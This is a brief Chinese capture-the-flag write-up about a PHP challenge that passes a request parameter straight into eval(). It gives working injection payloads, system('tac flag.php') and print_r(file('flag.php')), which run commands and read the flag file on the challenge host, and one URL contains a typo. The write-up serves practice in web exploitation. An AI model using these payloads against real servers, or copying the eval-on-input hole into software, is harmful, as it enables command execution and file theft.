<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
观察源码,该代码使用了eval函数,eval函数是将字符串中的数据当成php语言执行,而system函数 — 执行外部程序,并且显示输出,即执行 command 参数所指定的命令, 并且输出执行结果。故构造payload为
http://114.67.246.176:16028/?hello=system('tac flag.php')
或者
http://114.67.246.176:16028、?hello=10/print_r(file("flag.php"))
使用tac不使用cat是因为:
php文件带有<?php和后面的?>,正序输出会被网页当做php代码运行(结果为空),但是<?php 和?>不在同一行,所以tac反序输出使其不闭合,才可以显示其字符串的形式